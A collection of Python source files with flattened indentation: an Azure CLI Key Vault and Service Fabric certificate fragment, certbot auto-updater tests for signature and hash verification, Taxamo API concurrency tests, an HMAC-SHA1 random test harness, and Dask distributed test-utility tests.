crypto.FILETYPE_PEM, p12.get_certificate()))
ca = p12.get_ca_certificates()
if ca is not None:
for cert in ca:
f_pem.write(crypto.dump_certificate(
crypto.FILETYPE_PEM, cert))
f_pem.close()
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pem_path):
os.remove(pem_path)
raise ex
if pfx_path:
try:
import base64
decoded = base64.b64decode(secret_value)
p12 = crypto.load_pkcs12(decoded)
with open(pfx_path, 'wb') as f:
f.write(decoded)
except Exception as ex: # pylint: disable=broad-except
if os.path.isfile(pfx_path):
os.remove(pfx_path)
raise ex
def _get_default_policy(subject): # pylint: disable=unused-argument
if subject.lower().startswith('cn') is not True:
subject = "CN={0}".format(subject)
return _default_certificate_profile(subject)
def _default_certificate_profile(subject):
template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
key_type=u'RSA',
key_size=2048,
reuse_key=True),
secret_properties=SecretProperties(
content_type=u'application/x-pkcs12'),
x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
KeyUsageType.data_encipherment,
KeyUsageType.digital_signature,
KeyUsageType.key_encipherment,
KeyUsageType.key_agreement,
KeyUsageType.key_cert_sign],
subject=subject,
validity_in_months=12),
lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
action=Action(action_type=ActionType.auto_renew))],
issuer_parameters=IssuerParameters(
name=u'Self',),
attributes=CertificateAttributes(enabled=True))
return template
def _create_self_signed_key_vault_certificate(vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
cert_attrs = CertificateAttributes(not disabled)
logger.info("Starting long running operation 'keyvault certificate create'")
if validity is not None:
certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
client = _get_keyVault_not_arm_client()
client.create_certificate(
vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
# otherwise loop until the certificate creation is complete
while True:
check = client.get_certificate_operation(
vault_base_url, certificate_name)
if check.status != 'inProgress':
logger.info("Long running operation 'keyvault certificate create' finished with result %s.",
check) # pylint: disable=line-too-long
break
try:
time.sleep(10)
except KeyboardInterrupt:
logger.info("Long running operation wait cancelled.")
raise
except Exception as client_exception:
message = getattr(client_exception, 'message', client_exception)
import json
try:
message = str(message) + ' ' + json.loads(
client_exception.response.text)['error']['details'][0]['message'] # pylint: disable=no-member
except: # pylint: disable=bare-except
pass
raise CLIError('{}'.format(message))
pem_output_folder = None
if certificate_output_folder is not None:
pem_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pem')
pfx_output_folder = os.path.join(
certificate_output_folder, certificate_name + '.pfx')
_download_secret(vault_base_url, certificate_name,
pem_output_folder, pfx_output_folder)
return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
_create_self_signed_key_vault_certificate.__doc__ = KeyVaultClient.create_certificate.__doc__
def _get_keyVault_not_arm_client():
from azure.cli.core._profile import Profile
from azure.keyvault import KeyVaultAuthentication # pylint: unused-variable, reimported
def get_token(server, resource, scope): # pylint: disable=unused-argument
return Profile().get_login_credentials(resource)[0]._token_retriever() # pylint: disable=protected-access
client = KeyVaultClient(KeyVaultAuthentication(get_token))
return client
def _create_keyvault(resource_group_name,
vault_name,
location=None,
sku=KeyVaultSkuName.standard.value,
enabled_for_deployment=True,
enabled_for_disk_encryption=None,
enabled_for_template_deployment=None,
no_self_perms=None, tags=None):
from azure.mgmt.keyvault.models import VaultCreateOrUpdateParameters
from azure.cli.core._profile import Profile, CLOUD
from azure.graphrbac.models import GraphErrorException
profile = Profile()
cred, _, tenant_id = profile.get_login_credentials(
resource=CLOUD.endpoints.active_directory_graph_resource_id)
graph_client = GraphRbacManagementClient(cred,
tenant_id,
base_url=CLOUD.endpoints.active_directory_graph_resource_id) # pylint: disable=line-too-long
subscription = profile.get_subscription()
if no_self_perms:
access_policies = []
else:
permissions = Permissions(keys=[KeyPermissions.get,
KeyPermissions.create,
KeyPermissions.delete,
KeyPermissions.list,
KeyPermissions.update,
KeyPermissions.import_enum,
KeyPermissions.backup,
KeyPermissions.restore],
secrets=[SecretPermissions.get,
SecretPermissions.list,
SecretPermissions.set,
SecretPermissions.delete,
SecretPermissions.backup,
SecretPermissions.restore,
SecretPermissions.recover],
certificates=[CertificatePermissions.get,
CertificatePermissions.list,
CertificatePermissions.delete,
CertificatePermissions.create,
CertificatePermissions.import_enum,
CertificatePermissions.update,
CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory().vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
_create_keyvault.__doc__ = VaultProperties.__doc__
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.objects.get_current_user()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
elif subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
else:
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, template_file = _get_template_file_and_parameters_file( # pylint: disable=redefined-outer-name, unused-variable
linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
return parameters
def _set_parameters_for_customize_template(resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
if SOURCE_VAULT_VALUE not in parameters and CERTIFICATE_THUMBPRINT not in parameters and CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Primary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
return parameters, output_file
def _modify_template(linux):
parameter_file, template_file = _get_template_file_and_parameters_file( # pylint: disable=unused-variable
linux)
template = get_file_json(template_file)
return template
|
auto_test.py | """Tests for letsencrypt-auto"""
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from contextlib import contextmanager
from functools import partial
from json import dumps
from os import chmod, environ, makedirs
from os.path import abspath, dirname, exists, join
import re
from shutil import copy, rmtree
import socket
import ssl
from stat import S_IRUSR, S_IXUSR
from subprocess import CalledProcessError, Popen, PIPE
import sys
from tempfile import mkdtemp
from threading import Thread
from unittest import TestCase
from pytest import mark
@mark.skip
def tests_dir():
"""Return a path to the "tests" directory."""
return dirname(abspath(__file__))
sys.path.insert(0, dirname(tests_dir()))
from build import build as build_le_auto
class RequestHandler(BaseHTTPRequestHandler):
"""An HTTPS request handler which is quiet and serves a specific folder."""
def __init__(self, resources, *args, **kwargs):
"""
:arg resources: A dict of resource paths pointing to content bytes
"""
self.resources = resources
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def log_message(self, format, *args):
"""Don't log each request to the terminal."""
def do_GET(self):
"""Serve a GET request."""
content = self.send_head()
if content is not None:
self.wfile.write(content)
def send_head(self):
"""Common code for GET and HEAD commands
This sends the response code and MIME headers and returns either a
bytestring of content or, if none is found, None.
"""
path = self.path[1:] # Strip leading slash.
content = self.resources.get(path)
if content is None:
self.send_error(404, 'Path "%s" not found in self.resources' % path)
else:
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
return content
def server_and_port(resources):
"""Return an unstarted HTTPS server and the port it will use."""
# Find a port, and bind to it. I can't get the OS to close the socket
# promptly after we shut down the server, so we typically need to try
# a couple ports after the first test case. Setting
# TCPServer.allow_reuse_address = True seems to have nothing to do
# with this behavior.
worked = False
for port in xrange(4443, 4543):
try:
server = HTTPServer(('localhost', port),
partial(RequestHandler, resources))
except socket.error:
pass
else:
worked = True
server.socket = ssl.wrap_socket(
server.socket,
certfile=join(tests_dir(), 'certs', 'localhost', 'server.pem'),
server_side=True)
break
if not worked:
raise RuntimeError("Couldn't find an unused socket for the testing HTTPS server.")
return server, port
@contextmanager
def serving(resources):
"""Spin up a local HTTPS server, and yield its base URL.
Use a self-signed cert generated as outlined by
https://coolaj86.com/articles/create-your-own-certificate-authority-for-
testing/.
"""
server, port = server_and_port(resources)
thread = Thread(target=server.serve_forever)
try:
thread.start()
yield 'https://localhost:{port}/'.format(port=port)
finally:
server.shutdown()
thread.join()
LE_AUTO_PATH = join(dirname(tests_dir()), 'letsencrypt-auto')
@contextmanager
def temp_paths():
"""Creates and deletes paths for letsencrypt-auto and its venv."""
dir = mkdtemp(prefix='le-test-')
try:
yield join(dir, 'letsencrypt-auto'), join(dir, 'venv')
finally:
rmtree(dir, ignore_errors=True)
def out_and_err(command, input=None, shell=False, env=None):
"""Run a shell command, and return stderr and stdout as string.
If the command returns nonzero, raise CalledProcessError.
:arg command: A list of commandline args
:arg input: Data to pipe to stdin. Omit for none.
Remaining args have the same meaning as for Popen.
"""
process = Popen(command,
stdout=PIPE,
stdin=PIPE,
stderr=PIPE,
shell=shell,
env=env)
out, err = process.communicate(input=input)
status = process.poll() # same as in check_output(), though wait() sounds better
if status:
error = CalledProcessError(status, command)
error.output = out
raise error
return out, err
def signed(content, private_key_name='signing.key'):
"""Return the signed SHA-256 hash of ``content``, using the given key file."""
command = ['openssl', 'dgst', '-sha256', '-sign',
join(tests_dir(), private_key_name)]
out, err = out_and_err(command, input=content)
return out
def install_le_auto(contents, install_path):
"""Install some given source code as the letsencrypt-auto script at the
root level of a virtualenv.
:arg contents: The contents of the built letsencrypt-auto script
:arg install_path: The path where to install the script
"""
with open(install_path, 'w') as le_auto:
le_auto.write(contents)
chmod(install_path, S_IRUSR | S_IXUSR)
def run_le_auto(le_auto_path, venv_dir, base_url, **kwargs):
"""Run the prebuilt version of letsencrypt-auto, returning stdout and
stderr strings.
If the command returns other than 0, raise CalledProcessError.
"""
env = environ.copy()
d = dict(VENV_PATH=venv_dir,
# URL to PyPI-style JSON that tell us the latest released version
# of LE:
LE_AUTO_JSON_URL=base_url + 'certbot/json',
# URL to dir containing letsencrypt-auto and letsencrypt-auto.sig:
LE_AUTO_DIR_TEMPLATE=base_url + '%s/',
# The public key corresponding to signing.key:
LE_AUTO_PUBLIC_KEY="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsMoSzLYQ7E1sdSOkwelg
tzKIh2qi3bpXuYtcfFC0XrvWig071NwIj+dZiT0OLZ2hPispEH0B7ISuuWg1ll7G
hFW0VdbxL6JdGzS2ShNWkX9hE9z+j8VqwDPOBn3ZHm03qwpYkBDwQib3KqOdYbTT
uUtJmmGcuk3a9Aq/sCT6DdfmTSdP5asdQYwIcaQreDrOosaS84DTWI3IU+UYJVgl
LsIVPBuy9IcgHidUQ96hJnoPsDCWsHwX62495QKEarauyKQrJzFes0EY95orDM47
Z5o/NDiQB11m91yNB0MmPYY9QSbnOA9j7IaaC97AwRLuwXY+/R2ablTcxurWou68
iQIDAQAB
-----END PUBLIC KEY-----""",
**kwargs)
env.update(d)
return out_and_err(
le_auto_path + ' --version',
shell=True,
env=env)
def set_le_script_version(venv_dir, version):
"""Tell the letsencrypt script to report a certain version.
We actually replace the script with a dummy version that knows only how to
print its version.
"""
letsencrypt_path = join(venv_dir, 'bin', 'letsencrypt')
with open(letsencrypt_path, 'w') as script:
script.write("#!/usr/bin/env python\n"
"from sys import stderr\n"
"stderr.write('letsencrypt %s\\n')" % version)
chmod(letsencrypt_path, S_IRUSR | S_IXUSR)
class AutoTests(TestCase):
"""Test the major branch points of letsencrypt-auto:
* An le-auto upgrade is needed.
* An le-auto upgrade is not needed.
* There was an out-of-date LE script installed.
* There was a current LE script installed.
* There was no LE script installed (less important).
* Pip hash-verification passes.
* Pip has a hash mismatch.
* The OpenSSL sig matches.
* The OpenSSL sig mismatches.
For tests which get to the end, we run merely ``letsencrypt --version``.
The functioning of the rest of the certbot script is covered by other
test suites.
"""
NEW_LE_AUTO = build_le_auto(
version='99.9.9',
requirements='letsencrypt==99.9.9 --hash=sha256:1cc14d61ab424cdee446f51e50f1123f8482ec740587fe78626c933bba2873a0')
NEW_LE_AUTO_SIG = signed(NEW_LE_AUTO)
def test_successes(self):
"""Exercise most branches of letsencrypt-auto.
They just happen to be the branches in which everything goes well.
I violate my usual rule of having small, decoupled tests, because...
1. We shouldn't need to run a Cartesian product of the branches: the
phases run in separate shell processes, containing state leakage
pretty effectively. The only shared state is FS state, and it's
limited to a temp dir, assuming (if we dare) all functions properly.
2. One combination of branches happens to set us up nicely for testing
the next, saving code.
"""
with temp_paths() as (le_auto_path, venv_dir):
# This serves a PyPI page with a higher version, a GitHub-alike
# with a corresponding le-auto script, and a matching signature.
resources = {'certbot/json': dumps({'releases': {'99.9.9': None}}),
'v99.9.9/letsencrypt-auto': self.NEW_LE_AUTO,
'v99.9.9/letsencrypt-auto.sig': self.NEW_LE_AUTO_SIG}
with serving(resources) as base_url:
run_letsencrypt_auto = partial(
run_le_auto,
le_auto_path,
venv_dir,
base_url,
PIP_FIND_LINKS=join(tests_dir(),
'fake-letsencrypt',
'dist'))
# Test when a phase-1 upgrade is needed, there's no LE binary
# installed, and pip hashes verify:
install_le_auto(build_le_auto(version='50.0.0'), le_auto_path)
out, err = run_letsencrypt_auto()
self.assertTrue(re.match(r'letsencrypt \d+\.\d+\.\d+',
err.strip().splitlines()[-1]))
# Make a few assertions to test the validity of the next tests:
self.assertTrue('Upgrading certbot-auto ' in out)
self.assertTrue('Creating virtual environment...' in out)
# Now we have le-auto 99.9.9 and LE 99.9.9 installed. This
# conveniently sets us up to test the next 2 cases.
# Test when neither phase-1 upgrade nor phase-2 upgrade is
# needed (probably a common case):
out, err = run_letsencrypt_auto()
self.assertFalse('Upgrading certbot-auto ' in out)
self.assertFalse('Creating virtual environment...' in out)
def test_phase2_upgrade(self):
"""Test a phase-2 upgrade without a phase-1 upgrade."""
with temp_paths() as (le_auto_path, venv_dir):
resources = {'certbot/json': dumps({'releases': {'99.9.9': None}}),
'v99.9.9/letsencrypt-auto': self.NEW_LE_AUTO,
'v99.9.9/letsencrypt-auto.sig': self.NEW_LE_AUTO_SIG}
with serving(resources) as base_url:
venv_bin = join(venv_dir, 'bin')
makedirs(venv_bin)
set_le_script_version(venv_dir, '0.0.1')
install_le_auto(self.NEW_LE_AUTO, le_auto_path)
pip_find_links=join(tests_dir(), 'fake-letsencrypt', 'dist')
out, err = run_le_auto(le_auto_path, venv_dir, base_url,
PIP_FIND_LINKS=pip_find_links)
self.assertFalse('Upgrading certbot-auto ' in out)
self.assertTrue('Creating virtual environment...' in out)
def test_openssl_failure(self):
"""Make sure we stop if the openssl signature check fails."""
with temp_paths() as (le_auto_path, venv_dir):
# Serve an unrelated hash signed with the good key (easier than
# making a bad key, and a mismatch is a mismatch):
resources = {'': '<a href="certbot/">certbot/</a>',
'certbot/json': dumps({'releases': {'99.9.9': None}}),
'v99.9.9/letsencrypt-auto': build_le_auto(version='99.9.9'),
'v99.9.9/letsencrypt-auto.sig': signed('something else')}
with serving(resources) as base_url:
copy(LE_AUTO_PATH, le_auto_path)
try:
out, err = run_le_auto(le_auto_path, venv_dir, base_url)
except CalledProcessError as exc:
self.assertEqual(exc.returncode, 1)
self.assertTrue("Couldn't verify signature of downloaded "
"certbot-auto." in exc.output)
else:
self.fail('Signature check on certbot-auto erroneously passed.')
def test_pip_failure(self):
"""Make sure pip stops us if there is a hash mismatch."""
with temp_paths() as (le_auto_path, venv_dir):
resources = {'': '<a href="certbot/">certbot/</a>',
'certbot/json': dumps({'releases': {'99.9.9': None}})}
with serving(resources) as base_url:
# Build a le-auto script embedding a bad requirements file:
install_le_auto(
build_le_auto(
version='99.9.9',
requirements='configobj==5.0.6 --hash=sha256:badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb'),
le_auto_path)
try:
out, err = run_le_auto(le_auto_path, venv_dir, base_url)
except CalledProcessError as exc:
self.assertEqual(exc.returncode, 1)
self.assertTrue("THESE PACKAGES DO NOT MATCH THE HASHES "
"FROM THE REQUIREMENTS FILE" in exc.output)
self.assertFalse(
exists(venv_dir),
msg="The virtualenv was left around, even though "
"installation didn't succeed. We shouldn't do "
"this, as it foils our detection of whether we "
"need to recreate the virtualenv, which hinges "
"on the presence of $VENV_BIN/letsencrypt.")
else:
self.fail("Pip didn't detect a bad hash and stop the "
"installation.")
|
test_concurrency.py | """
Copyright 2020 Taxamo, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
from threading import Thread
from decimal import Decimal
import unittest
from helper import *
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
def make_transaction_data(total_amount):
return {
'currency_code': 'USD',
'billing_country_code': 'IE',
'tax_country_code': 'IE',
'transaction_lines': [{'total_amount': total_amount,
'custom_id': 'line-100-1'}]
}
transaction_data_100 = make_transaction_data(100)
transaction_data_200 = make_transaction_data(200)
transaction_data_300 = make_transaction_data(300)
def thread_fn(api, results):
api_1 = api or taxamo.api.ApiApi(taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))
results.append([
api_1.calculateTax({'transaction': transaction_data_100}).transaction.total_amount,
api_1.calculateTax({'transaction': transaction_data_200}).transaction.total_amount,
api_1.calculateTax({'transaction': transaction_data_300}).transaction.total_amount
])
class TaxamoConcurrencyTest(TaxamoTest):
FORK_COUNT = 5
THREAD_COUNT = 5
def test_forks_apiapi_per_process(self):
pids = []
for n in range(self.FORK_COUNT):
pid = os.fork()
if pid == 0:
api_1 = taxamo.api.ApiApi(taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))
self.assertEqual(api_1.calculateTax({'transaction': transaction_data_100}).transaction.total_amount, 100)
os._exit(0)
else:
pids.append(pid)
api_2 = taxamo.api.ApiApi(taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))
self.assertEqual(api_2.calculateTax({'transaction': transaction_data_200}).transaction.total_amount, 200)
for pid in pids:
os.waitpid(pid, 0)
def test_forks_apiapi_per_process_multiple_requests(self):
pids = []
for n in range(self.FORK_COUNT):
pid = os.fork()
if pid == 0:
api_1 = taxamo.api.ApiApi(taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))
self.assertEqual(api_1.calculateTax({'transaction': transaction_data_100}).transaction.total_amount, 100)
self.assertEqual(api_1.calculateTax({'transaction': transaction_data_200}).transaction.total_amount, 200)
self.assertEqual(api_1.calculateTax({'transaction': transaction_data_300}).transaction.total_amount, 300)
os._exit(0)
else:
pids.append(pid)
api_2 = taxamo.api.ApiApi(taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))
self.assertEqual(api_2.calculateTax({'transaction': transaction_data_100}).transaction.total_amount, 100)
self.assertEqual(api_2.calculateTax({'transaction': transaction_data_200}).transaction.total_amount, 200)
self.assertEqual(api_2.calculateTax({'transaction': transaction_data_300}).transaction.total_amount, 300)
for pid in pids:
os.waitpid(pid, 0)
def test_threads_single_apiapi(self):
api = taxamo.api.ApiApi(taxamo.swagger.ApiClient(TEST_TOKEN, TEST_ADDRESS))
results = []
threads = []
for x in range(self.THREAD_COUNT):
threads.append(Thread(target=thread_fn, args=(api, results,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(results, self.THREAD_COUNT * [[Decimal(100), Decimal(200), Decimal(300)]])
def test_threads_apiapi_per_thread(self):
results = []
threads = []
for x in range(self.THREAD_COUNT):
threads.append(Thread(target=thread_fn, args=(None, results,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(results, self.THREAD_COUNT * [[Decimal(100), Decimal(200), Decimal(300)]])
|
test_random_hmac_sha1.py | import binascii
import hashlib
from hashlib import sha1
import hmac
import os
import random
import string
import subprocess
import sys
import time
import threading
import Queue
BIN_PATH = "./build/test_hmac_sha1"
NTHREADS = 2
NTESTS = 10
NBYTES = 20
global still_making_input
still_making_input = True
tests = Queue.Queue()
failures = list()
#
# Helper functions
#
def random_string(len):
""" Returns a random string of length 'len' consisting of upper + lowercase letters and digits """
ret = list()
rand = random.Random()
for i in xrange(len):
ret.append("%.02x" % rand.randint(0, 255))
return "".join(ret)
#selector = string.ascii_uppercase + string.ascii_lowercase + string.digits
#return ''.join(random.choice(selector) for _ in range(len))
def run_test(key, msg, expected_output):
""" Run the C test program, comparing the Python HMAC-SHA1 implementation to the one in C """
return subprocess.call([BIN_PATH, key, msg, expected_output])
def run_in_thread(target_function):
t = threading.Thread(target=target_function)
t.start()
t.join()
def run_tests():
while (tests.empty() == False) or (still_making_input == True):
try:
key, msg, out = tests.get(True, 0)
retcode = run_test(key, msg, out)
if retcode != 0:
failures.append([key, msg, out])
sys.stdout.write("X")
else:
sys.stdout.write(".")
sys.stdout.flush()
except Queue.Empty:
time.sleep(0.1) #pass # Ignore exceptions here
def hmac_sha_(key, msg):
return hmac.new(key, msg, sha1).hexdigest()
def hmac_sha(key, msg):
block_size = 64
# instantiate SHA1 objects
outer = hashlib.sha1()
inner = hashlib.sha1()
# zero-pad key
key = key + chr(0) * (block_size - len(key))
#key = "".join([chr(ord(k)) for k in key])
# Pad inner + outer
key_opad = "".join([chr(ord(k) ^ 0x5C) for k in key])
key_ipad = "".join([chr(ord(k) ^ 0x36) for k in key])
outer.update(key_opad)
inner.update(key_ipad)
inner.update(msg)
outer.update(inner.digest())
return outer.hexdigest()
def make_test_input():
# Create input and expected output
for i in xrange(NTESTS):
test_key = random_string(NBYTES)
test_msg = random_string(NBYTES)
test_output = hmac_sha(binascii.a2b_hex(test_key), binascii.a2b_hex(test_msg))
tests.put([test_key, test_msg, test_output])
#
# Test driver
#
if __name__ == "__main__":
# Read NTESTS from stdin
if len(sys.argv) > 1:
if sys.argv[1].isdigit():
NTESTS = int(sys.argv[1])
# Read NTHREADS from stdin
if len(sys.argv) > 2:
if sys.argv[2].isdigit():
NTHREADS = int(sys.argv[2])
# Read NBYTES from stdin
if len(sys.argv) > 3:
if sys.argv[3].isdigit():
NBYTES = int(sys.argv[3])
# Tell user what is going to happen
print("")
str_threads = "thread"
if NTHREADS > 1:
str_threads += "s"
print("Running %d %s calculating HMAC-SHA1 on %d pairs of random %d-byte strings," % (NTHREADS, str_threads, NTESTS, NBYTES))
print("comparing the results to the HMAC calculation using Python's hashlib.sha1().")
print("")
t_mk_input = threading.Thread(target=make_test_input)
t_mk_input.start()
# Create new threads
threadlist = list()
for i in range(NTHREADS):
threadlist.append(threading.Thread(target=run_tests))
# Run all threads
for i, thread in enumerate(threadlist):
thread.start()
t_mk_input.join()
still_making_input = False
# Wait for threads to complete
for i, thread in enumerate(threadlist):
thread.join()
print(" ")
print(" ")
print("%d/%d tests succeeded." % (NTESTS - len(failures), NTESTS))
print(" ")
if len(failures) > 0:
error_log = open("error_log.txt", "a")
for fail_key, fail_msg, fail_output in failures:
error_log.write("%s %s %s %s %s" % (BIN_PATH, fail_key, fail_msg, fail_output, os.linesep))
error_log.close()
|
test_utils_test.py | import asyncio
import pathlib
import socket
import threading
from contextlib import contextmanager
from time import sleep
import pytest
from tornado import gen
from distributed import Client, Nanny, Scheduler, Worker, config, default_client
from distributed.core import rpc
from distributed.metrics import time
from distributed.utils import get_ip
from distributed.utils_test import (
cluster,
gen_cluster,
gen_test,
inc,
new_config,
tls_only_security,
wait_for_port,
)
def test_bare_cluster(loop):
with cluster(nworkers=10) as (s, _):
pass
def test_cluster(loop):
with cluster() as (s, [a, b]):
with rpc(s["address"]) as s:
ident = loop.run_sync(s.identity)
assert ident["type"] == "Scheduler"
assert len(ident["workers"]) == 2
@gen_cluster(client=True)
async def test_gen_cluster(c, s, a, b):
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
assert s.nthreads == {w.address: w.nthreads for w in [a, b]}
assert await c.submit(lambda: 123) == 123
@gen_cluster(client=True)
async def test_gen_cluster_pytest_fixture(c, s, a, b, tmp_path):
assert isinstance(tmp_path, pathlib.Path)
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@gen_cluster(client=True)
async def test_gen_cluster_parametrized(c, s, a, b, foo):
assert foo is True
assert isinstance(c, Client)
assert isinstance(s, Scheduler)
for w in [a, b]:
assert isinstance(w, Worker)
@pytest.mark.parametrize("foo", [True])
@pytest.mark.parametrize("bar", ["a", "b"])
@gen_cluster(client=True)
async def test_gen_cluster_multi_parametrized(c, s, a, b, foo, bar):
assert foo is True
assert bar in ("a", "b")
assert isinstance(c, Client)
